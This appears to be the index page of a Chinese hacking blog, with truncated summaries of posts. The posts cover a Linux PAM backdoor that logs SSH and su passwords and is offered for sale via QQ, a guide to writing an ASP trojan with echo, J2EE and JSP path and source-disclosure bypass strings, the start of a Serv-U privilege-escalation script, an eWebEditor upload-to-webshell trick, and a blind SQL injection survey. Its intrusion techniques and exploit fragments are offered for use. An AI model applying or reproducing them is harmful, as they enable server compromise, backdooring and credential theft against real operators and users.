既然已经失去了进入天堂寻觅幸福的资格..那么就让我沉沦地狱吧!

    摘要：   期待最近bct重新开张    （全文共24字）——点击此处阅读全文

    摘要：

  牛人无数，sql无处不在啊！

北京时间7月22日消息，据国外媒体报道，俄罗斯信息安全厂商卡巴斯基实验室的马拉西亚网站周六被黑客攻破，相关的一个网络购物站点也受到影响。

　　网络安全组织Zone-H记录了这次攻击。
　　
　　记录显示，攻击者昵称为“m0sted”，攻击采用了“SQL注入”的方式。卡巴斯基随后关闭了该网站，该网站采用的是微软的IIS网络服务器。随后该网站不再面向所有用户开放，在接入前要求输入用户名和密码。

　　Zone-H同时公布了卡巴斯基该网站被攻破之后的截图。卡巴斯基尚未对这一事件发表评论，不过Zone-H表示，由于此次的攻击仅仅是以破坏为目的，因此未来还有可能出现更严重的安全风险。

　　卡巴斯基在该网站上提供评估版的安全软件下载，因此攻击者有可能以卡巴斯基的名义在该网站上发布恶意软件，这将对用户造成巨大威胁。

    （全文共450字）——点击此处阅读全文

    摘要：

  废话不多说了,直接把动画txt写上,要的联系,货真价实的.联系qq:909473606

1.安装
编译好后，cp过去文件即可
有的发行版本，会自己做自己的发行版so，所以一般来说，我们都先在自己机器上编译好后门传上去
linux一般来说发行版比较多，所以我们在安装后门之前，最好在本地搭建个类似的环境实验，这样不容易丢鸡

我现在要安装后门的机器是fc4 具体内核没啥限制 应用层后门就这点好，呵呵

安装
我已经编译好了

安装完毕，那个so穿上去就行了
这是我们的后门

注意吧pam_unix.so文件的属性改的和别的so属性一样。我这里本来就是一样的，我就不改了。

OK，安装完毕

现在看看他有什么功能

1.记录密码
这个后门可以记录所有登录sshd的用户密码，以及su的密码，默认，没开启记录功能。开启方法如下

我们开启

touch     （全文共1002字）——点击此处阅读全文

    摘要：Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。


文件传输
对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：

1，用Echo命令写ASP木马。
前提当然是目标主机上已经安装了IIS。
一般的ASP木马"体积"较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。
直接给出echo版：

@echo ^ >up.asp

注意，只有一行，中间没有回车符。
生成的up.asp不能用浏览器访问，只    （全文共22729字）——点击此处阅读全文

    摘要：

J2EE的WEB，都有一个WEB-INF的目录，这个目录下有所有的WEB配置文件，数据库配置文件和java二进制文件class文件。有很多站因为配置错误或者是默认配置，导致WEB-INF目录可浏览。通常一些J2EE WEB平台还有些通用的限制绕过漏洞

/WEB-INF../    /WEB-INF..%5C

J2EE的程序访问是通过配置文件里的路径设定实现的，"/xxx.do",并不代表目录下有xxx.do这个文件。

JSP的注射，现在已经有些工具可以实现，手工就没必要介绍了。但jsp有一些通用的源码泄露漏洞（一些流行的JSP WEB平台现在已经没这些漏洞了，低版本的还是有。如果看到是些不常见的JSP服务器，可以试一下）

.jsP .Jsp .jSp .JSP .jsp%2e .jsp%20 .jsp%80 .jsp%81.....jsp%89

关于HTTP访问和SSL访问差异，在有些情况下，WWW和SSL对WEB的访问，采取的是不同的配置。比如WEB    （全文共905字）——点击此处阅读全文

    摘要： 忽然发现1个多月前替代就给我几张此照片，我还笑他是ps的，这傻！    （全文共38字）——点击此处阅读全文

    摘要：Serv-U 6.X 提权脚本
使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在"服务器端口"里填21，然后再在"服务器IP"中填写服务器的真实IP。
复制内容到剪贴板代码:
<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(reque    （全文共10323字）——点击此处阅读全文

    摘要：打开eWebEditorNet/upload.aspx，选择一个cer文件。
再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。    （全文共117字）——点击此处阅读全文

    摘要：SQL盲注攻击技术综述

1 SQL盲注攻击技术综述 Javaphile
SQL盲注攻击技术综述
coolswallow of Javaphile (coolswallow@shaolin.org.cn)
Blind SQL Injection Techniques: A Survey
Abstract: This paper gives a survey of current Blind SQL Injection Techniques. It first introduces the definition
of SQL Injection and its risk, and reviews several solutions proposed to solve the problem and their each
disadvantages. Then, the paper discusses that if detailed error messages are suppressed, how to     （全文共13096字）——点击此处阅读全文